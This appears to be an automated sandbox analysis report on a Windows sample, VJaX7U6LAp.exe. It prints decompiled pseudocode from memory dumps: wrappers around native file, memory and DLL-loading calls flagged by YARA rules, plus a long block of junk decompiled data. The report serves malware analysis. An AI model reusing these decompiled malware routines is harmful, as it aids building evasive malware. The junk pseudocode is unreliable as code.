					 *((intOrPtr*)(_t119 + 0x6101218)) =  *((intOrPtr*)(_t119 + 0x6101218)) + _t71;
					 *__edx =  *__edx + __edx;
					 *_t71 =  *_t71 + _t91;
					 *_t71 =  *_t71 ^ _t71;
				}
				 *_t71 =  *_t71 + _t71;
				 *((intOrPtr*)(_t96 - 0x28f638f8)) =  *((intOrPtr*)(_t96 - 0x28f638f8)) + _t71;
				 *_t107 =  *_t107 + _t119;
				 *((intOrPtr*)(_t71 + _t119)) =  *((intOrPtr*)(_t71 + _t119)) + _t91;
				 *_t71 =  *_t71 + _t71;
				 *_t71 =  *_t71 + _t71;
				 *_t71 =  *_t71 | 0x01d713b7;
				_t72 = _t71 ^  *_t71;
				asm("pushad");
				 *_t72 =  *_t72 ^ _t72;
				 *_t72 =  *_t72 + _t72;
				 *((intOrPtr*)(_t119 + 0x6101218)) =  *((intOrPtr*)(_t119 + 0x6101218)) + _t72;
				 *_t107 =  *_t107 + _t107;
				 *_t72 =  *_t72 + _t107;
				 *_t72 =  *_t72 ^ _t72;
				 *_t72 =  *_t72 + _t72;
				 *((intOrPtr*)(_t96 + 0x100e0100)) =  *((intOrPtr*)(_t96 + 0x100e0100)) + _t72;
				_push(es);
				_t73 = _t72 ^  *_t72;
				 *_t96 = _t107;
				 *_t73 =  *_t73 + _t73;
				 *_t73 =  *_t73 + _t73;
				 *_t73 =  *_t73 + 0x6160d07;
				_t74 = _t73 ^  *_t73;
				asm("pushfd");
				 *_t74 =  *_t74 ^ _t74;
				 *_t74 =  *_t74 + _t74;
				 *((intOrPtr*)(_t96 - 0x4eeb5300)) =  *((intOrPtr*)(_t96 - 0x4eeb5300)) + _t74;
				_t120 = _t119 +  *_t91;
				 *_t116 =  *_t116 + _t96;
				_t75 = _t74 ^  *_t74;
				 *_t75 =  *_t75 + _t75;
				 *((intOrPtr*)(_t96 + 0x220a7800)) =  *((intOrPtr*)(_t96 + 0x220a7800)) + _t75;
				 *_t75 =  *_t75 + _t75;
				 *((intOrPtr*)(_t96 + 0x220a6800)) =  *((intOrPtr*)(_t96 + 0x220a6800)) + _t75;
				_t109 = _t107 +  *0x321e00 +  *_t116;
				 *_t75 =  *_t75 + _t91;
				_t76 = _t75 ^  *_t75;
				 *_t76 =  *_t76 + _t76;
				 *((intOrPtr*)(_t96 + 0x10044400)) =  *((intOrPtr*)(_t96 + 0x10044400)) + _t76;
				 *_t96 =  *_t96 + _t91;
				 *((intOrPtr*)(_t109 + _t120)) =  *((intOrPtr*)(_t109 + _t120)) + _t96;
				 *_t76 =  *_t76 + 0x28f041e;
				asm("outsb");
				_t77 = _t76 ^ 0x00000000;
				 *_t77 =  *_t77 + _t77;
				 *((intOrPtr*)(_t96 + 0x60aba00)) =  *((intOrPtr*)(_t96 + 0x60aba00)) + _t77;
				 *_t109 =  *_t109 + _t91;
				 *((intOrPtr*)(_t77 + 0x34)) =  *((intOrPtr*)(_t77 + 0x34)) + _t77;
				 *((intOrPtr*)(_t96 + 0x1d08bd00)) =  *((intOrPtr*)(_t96 + 0x1d08bd00)) + _t77;
				_push(es);
				 *(_t77 + _t77) =  *(_t77 + _t77) << 1;
				 *_t77 =  *_t77 + _t77;
				_t80 =  &(( &((_t77 + _t77)[_t91]))[0x3c0015]);
				 *0 =  *0 | _t109;
				 *_t80 =  *_t80 + 0x6250e8e;
				 *_t80 =  &(_t80[ *_t80]);
				 *((intOrPtr*)(_t96 + 0x6145000)) =  *((intOrPtr*)(_t96 + 0x6145000)) + _t80;
				 *_t120 =  *_t120 + _t91;
				 *_t91 =  *_t91 + _t109;
				 *_t80 =  *_t80 + 0x2220064;
				 *[ds:edi] =  *[ds:edi] + _t91;
				 *_t80 =  *_t80 + 0x222010b;
				_t81 =  &(_t80[1]);
				 *((intOrPtr*)(_t126 + 0x3d)) =  *((intOrPtr*)(_t126 + 0x3d)) + _t81;
				 *_t81 =  *_t81 + _t81;
				 *_t81 =  *_t81 + _t81;
				 *_t81 =  *_t81 + 0x2220172;
				_t110 = _t109 + 1;
				 *((intOrPtr*)(_t81 + 0x3d)) =  *((intOrPtr*)(_t81 + 0x3d)) + _t110;
				 *_t81 =  *_t81 + _t81;
				 *_t81 =  *_t81 + _t81;
				 *_t81 =  *_t81 + 0x60017;
				_t97 = _t96 + _t110;
				 *_t81 =  *_t81 + 0x600f2;
				 *_t116 =  *_t116 + _t91;
				 *[ds:eax] =  *[ds:eax] + _t81;
				 *_t81 =  *_t81 + _t81;
				 *_t81 =  *_t81 + 0x62b0073;
				 *_t81 =  *_t81 + _t97;
				 *[ds:eax] =  *[ds:eax] + _t81;
				 *_t81 =  *_t81 + _t81;
				 *_t81 = _t97;
				_t121 = _t120 - 1;
				 *((intOrPtr*)(_t81 + _t81 + 0x40)) =  *((intOrPtr*)(_t81 + _t81 + 0x40)) + _t81;
				 *[ds:eax] =  *[ds:eax] + _t81;
				 *_t81 =  *_t81 + _t81;
				asm("repe or edi, edx");
				 *((intOrPtr*)(_t81 + _t81 + 0x58)) =  *((intOrPtr*)(_t81 + _t81 + 0x58)) + _t81;
				 *[ds:eax] =  *[ds:eax] + _t81;
				 *_t81 =  *_t81 + _t81;
				asm("enter 0x3011, 0x6");
				 *((intOrPtr*)(_t121 + _t116)) =  *((intOrPtr*)(_t121 + _t116)) + _t91;
				_t101 =  *_t81;
				_t82 = _t81 | 0x0044063c;
				asm("aam 0x3e");
				 *_t82 =  *_t82 + _t82;
				 *_t82 =  *_t82 + _t82;
				_t92 =  *_t82;
				 *_t82 = _t91;
				asm("adc dl, [eax]");
				 *_t92 =  *_t92 - _t82;
				 *((intOrPtr*)(_t116 + _t116)) =  *((intOrPtr*)(_t116 + _t116)) + _t82;
				 *_t82 =  *_t82 + _t82;
				 *_t82 =  *_t82 + _t82;
				 *_t82 =  *_t82 + 0x60b27;
				 *((intOrPtr*)(_t116 + _t116)) =  *((intOrPtr*)(_t116 + _t116)) + _t101;
				_t83 =  *_t82;
				 *_t83 = _t82;
				_t123 = _t121 + 2;
				_t84 =  >=  ?  *_t123 : _t83;
				_t85 = ( >=  ?  *_t123 : _t83) + _t92;
				_t86 = ( >=  ?  *_t123 : _t83) + _t92 + 1;
				 *_t86 =  *_t86 + _t86;
				 *_t86 =  *_t86 + _t86;
				_t87 =  *_t86;
				 *_t87 = _t86;
				_push(_t101);
				asm("clts");
				 *_t101 =  *_t101 + _t101;
				asm("adc [ecx], al");
				 *_t87 =  *_t87 + _t87;
				 *((intOrPtr*)(_t101 + 0x48132600)) =  *((intOrPtr*)(_t101 + 0x48132600)) + _t87;
				_push(es);
				 *_t87 =  *_t87 + _t110 + _t91;
				_t103 = _t101 - 1 + 1;
				 *_t87 =  *_t87 + _t87;
				 *_t87 =  *_t87 + _t87;
				_t88 =  *_t87;
				 *_t88 = _t87;
				_t125 = _t123 + 1 - 1;
				_push(es);
				_t89 = _t88 + _t103;
				 *_t89 =  *_t89 + _t89;
				 *_t89 =  *_t89 + _t89;
				 *_t89 = _t103 + 1;
				 *0x00000014 =  *((intOrPtr*)(0x14)) + _t89;
				 *_t89 =  *_t89 + _t89;
				 *((intOrPtr*)(_t125 + 0x3c0ced08)) =  *((intOrPtr*)(_t123 + 1 - 1 + 0x3c0ced08)) + _t89;
				_push(es);
				_push(_t89);
				 *_t89 =  *_t89 + _t92;
				 *_t89 =  *_t89 + _t89;
				 *_t89 =  *_t89 + _t89;
				 *_t89 = _t92;
				asm("adc dl, [eax]");
				_push(es);
				_push(_t89);
				 *_t89 =  *_t89 + 0x15;
				 *_t89 =  *_t89 + _t89;
				 *_t89 =  *_t89 + _t89;
				return _t89;
			}


































                        0x00145375
                        0x00145375
                        0x00145375
                        0x00145377
                        0x0014537d
                        0x0014537e
                        0x00145380
                        0x00145382
                        0x00145384
                        0x00145388
                        0x0014538a
                        0x0014538b
                        0x0014538c
                        0x0014538e
                        0x00145390
                        0x00145393
                        0x00145395
                        0x00145397
                        0x00145399
                        0x0014539a
                        0x0014539c
                        0x0014539e
                        0x0014539e
                        0x001453a0
                        0x001453a2
                        0x001453a3
                        0x001453a5
                        0x001453a7
                        0x001453a9
                        0x001453ab
                        0x001453b1
                        0x001453b3
                        0x001453b5
                        0x001453b5
                        0x001453b7
                        0x001453b9
                        0x001453bf
                        0x001453c1
                        0x001453c4
                        0x001453c6
                        0x001453c8
                        0x001453ce
                        0x001453d0
                        0x001453d1
                        0x001453d3
                        0x001453d5
                        0x001453db
                        0x001453dd
                        0x001453df
                        0x001453e1
                        0x001453e3
                        0x001453e9
                        0x001453ea
                        0x001453ec
                        0x001453ee
                        0x001453f0
                        0x001453f2
                        0x001453f8
                        0x001453fa
                        0x001453fb
                        0x001453fd
                        0x001453ff
                        0x00145405
                        0x00145407
                        0x00145409
                        0x0014540b
                        0x0014540d
                        0x00145419
                        0x0014541b
                        0x00145421
                        0x00145423
                        0x00145425
                        0x00145427
                        0x00145429
                        0x0014542f
                        0x00145431
                        0x00145438
                        0x00145440
                        0x00145441
                        0x00145443
                        0x00145445
                        0x0014544b
                        0x0014544d
                        0x00145453
                        0x00145459
                        0x0014545c
                        0x0014545f
                        0x00145465
                        0x0014546a
                        0x00145470
                        0x0014547b
                        0x0014547d
                        0x00145483
                        0x00145485
                        0x0014548c
                        0x00145492
                        0x0014549a
                        0x001454a0
                        0x001454a1
                        0x001454a4
                        0x001454a6
                        0x001454a8
                        0x001454ae
                        0x001454af
                        0x001454b2
                        0x001454b4
                        0x001454b6
                        0x001454bd
                        0x001454c4
                        0x001454cb
                        0x001454cd
                        0x001454d0
                        0x001454d2
                        0x001454d9
                        0x001454db
                        0x001454de
                        0x001454e0
                        0x001454e2
                        0x001454e5
                        0x001454e9
                        0x001454ec
                        0x001454f0
                        0x001454f3
                        0x001454f7
                        0x001454fa
                        0x001454fe
                        0x00145503
                        0x0014550a
                        0x0014550d
                        0x00145512
                        0x00145514
                        0x00145516
                        0x00145518
                        0x00145518
                        0x0014551a
                        0x0014551c
                        0x0014551f
                        0x00145522
                        0x00145524
                        0x00145526
                        0x0014552d
                        0x00145534
                        0x00145534
                        0x00145536
                        0x00145537
                        0x0014553b
                        0x0014553d
                        0x0014553e
                        0x00145540
                        0x00145542
                        0x00145542
                        0x00145544
                        0x00145545
                        0x00145547
                        0x0014554a
                        0x0014554d
                        0x0014554f
                        0x00145555
                        0x00145557
                        0x00145559
                        0x0014555a
                        0x0014555c
                        0x0014555e
                        0x0014555e
                        0x00145562
                        0x00145563
                        0x00145565
                        0x00145568
                        0x0014556a
                        0x0014556c
                        0x00145574
                        0x00145577
                        0x00145579
                        0x0014557f
                        0x00145580
                        0x00145581
                        0x00145584
                        0x00145586
                        0x00145588
                        0x0014558a
                        0x0014558d
                        0x0014558e
                        0x0014558f
                        0x00145592
                        0x00145594
                        0x00145598

                        Memory Dump Source
                        • Source File: 00000000.00000002.361212049.0000000000142000.00000002.00020000.sdmp, Offset: 00140000, based on PE: true
                        • Associated: 00000000.00000002.361201067.0000000000140000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.361225672.000000000014F000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.361257547.000000000015A000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.361346330.00000000001C2000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2987b6f405de08ca06e6db272c9fb6b08d6a727d80afb26aa28982de7a60cea5
                        • Instruction ID: 6edc6100ede1acee5a90859b2af34609da5b0150e2a8f34f54a7a0f4048c6ef1
                        • Opcode Fuzzy Hash: 2987b6f405de08ca06e6db272c9fb6b08d6a727d80afb26aa28982de7a60cea5
                        • Instruction Fuzzy Hash: 4381A76144E3D1AFC75387744CB46827FB0AE53224B6E85EBC4C2CF5A3E25D085AD7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 057709A8, Relevance: .1, Instructions: 144COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3c92339f1e3eba029f1e64391dac75186ab1367106c1ed5eb4f9604b05997492
                        • Instruction ID: 96748c999561e02a753f2f1d0027e753f90ea0539d7be626e8e72fa1a5c4db95
                        • Opcode Fuzzy Hash: 3c92339f1e3eba029f1e64391dac75186ab1367106c1ed5eb4f9604b05997492
                        • Instruction Fuzzy Hash: 57514C74E013088FDB44EFB5E9946DEBBF6EB84304F04D839D504AB268EB74598ACB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 057709A6, Relevance: .1, Instructions: 143COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4ac1d3f4fa51c032268d23c7993363ed55d99944917d09e08fcfdb1e801a6de
                        • Instruction ID: 2d47bd03b1522693c37366692826dcc6845e06a137b537bc3f03cae3aaa391a6
                        • Opcode Fuzzy Hash: d4ac1d3f4fa51c032268d23c7993363ed55d99944917d09e08fcfdb1e801a6de
                        • Instruction Fuzzy Hash: 44514C34E013088FDB44EFB5E9946DEBBF6EB84304F04D839D505AB268EB74598ACB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: VJaX7U6LAp.exe PID: 6284 Parent PID: 6316 VJaX7U6LAp.exeCOMMON

                        Executed Functions

                        Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                        0x00419e03
                        0x00419e0f
                        0x00419e17
                        0x00419e22
                        0x00419e3d
                        0x00419e45
                        0x00419e49

                        APIs
                        • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 2MA$2MA
                        • API String ID: 2738559852-947276439
                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00419D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E00419D4B(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t32;

				asm("in eax, dx");
				asm("clc");
				asm("rcl byte [ebp-0x75], 0xec");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041A950(_t32, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                        0x00419d4d
                        0x00419d4e
                        0x00419d4f
                        0x00419d53
                        0x00419d5f
                        0x00419d67
                        0x00419d89
                        0x00419d9d
                        0x00419da1

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: wKA
                        • API String ID: 823142352-3165208591
                        • Opcode ID: 3dfe97fc43ba6ce74f5e4af6aaac8378e2e702818d3680ccd1dad68eb5b3ffef
                        • Instruction ID: 171a81934c3c7c60c337ad403773ace1515801b8f7e3dceb6118aea4b3c41b01
                        • Opcode Fuzzy Hash: 3dfe97fc43ba6ce74f5e4af6aaac8378e2e702818d3680ccd1dad68eb5b3ffef
                        • Instruction Fuzzy Hash: 1201F6B2200109BFCB08CF98DC85EEB77A9AF8C754F15824CFA5D97241C630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                        0x00419d5f
                        0x00419d67
                        0x00419d89
                        0x00419d9d
                        0x00419da1

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: wKA
                        • API String ID: 823142352-3165208591
                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00419F2D, Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E00419F2D(void* __esi, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {
				void* _t37;

				asm("daa");
				_t37 = __esi - 1;
				if (_t37 >= 0) goto L3;
			}




                        0x00419f2d
                        0x00419f2e
                        0x00419f2f

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 93b34ab001ca49a4dfed7a8792debca3667baccbd67a0a437f6b7862a62b0d36
                        • Instruction ID: 0dfea3d50b55b6264416a61c865fb79426a71bb047c54ae097aa9f51a6ea940a
                        • Opcode Fuzzy Hash: 93b34ab001ca49a4dfed7a8792debca3667baccbd67a0a437f6b7862a62b0d36
                        • Instruction Fuzzy Hash: 990108B1200209AFCB04DF89DC91DEB77ADAF88314F118509FD5897241C634E8618BE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                        0x0040acdc
                        0x0040acdf
                        0x0040ace4
                        0x0040ace9
                        0x0040acf3
                        0x0040acf8
                        0x0040acfb
                        0x0040acfd
                        0x0040ad05
                        0x0040ad0a
                        0x0040ad0a
                        0x0040ad11
                        0x0040ad19
                        0x0040ad1c
                        0x0040ad1e
                        0x0040ad32
                        0x00000000
                        0x0040ad34
                        0x0040ad3a
                        0x0040acee
                        0x0040acee
                        0x0040acee

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E00419E7A(void* __eax, void* __esi, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t13;

				asm("arpl [eax-0x1374aaf0], dx");
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x40a913
				E0041A950(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8);
				asm("rcr byte [esi+0x5d], 1");
				return _t10;
			}





                        0x00419e7d
                        0x00419e83
                        0x00419e86
                        0x00419e8f
                        0x00419e97
                        0x00419ea5
                        0x00419ea6
                        0x00419ea9

                        APIs
                        • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: b40df1d7741cb8d30f687e5d97e1f84a6941624dcd74f063d41cb2d6739f338d
                        • Instruction ID: 6549781c7089ca072ac01950d1cb3db55a0379d67572cb97e9cbd212e5d13e1f
                        • Opcode Fuzzy Hash: b40df1d7741cb8d30f687e5d97e1f84a6941624dcd74f063d41cb2d6739f338d
                        • Instruction Fuzzy Hash: 62E08C71201210BBE710EBA4CC85ED77B68EF48320F11849AFA2C9B242D630A6408790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E00419E80(void* __esi, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8);
				asm("rcr byte [esi+0x5d], 1");
				return _t8;
			}





                        0x00419e83
                        0x00419e86
                        0x00419e8f
                        0x00419e97
                        0x00419ea5
                        0x00419ea6
                        0x00419ea9

                        APIs
                        • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00409A80, Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                        • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                        • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                        • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                        0x0041a037
                        0x0041a03c
                        0x0041a04d
                        0x0041a051

                        APIs
                        • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: oLA
                        • API String ID: 1279760036-3789366272
                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
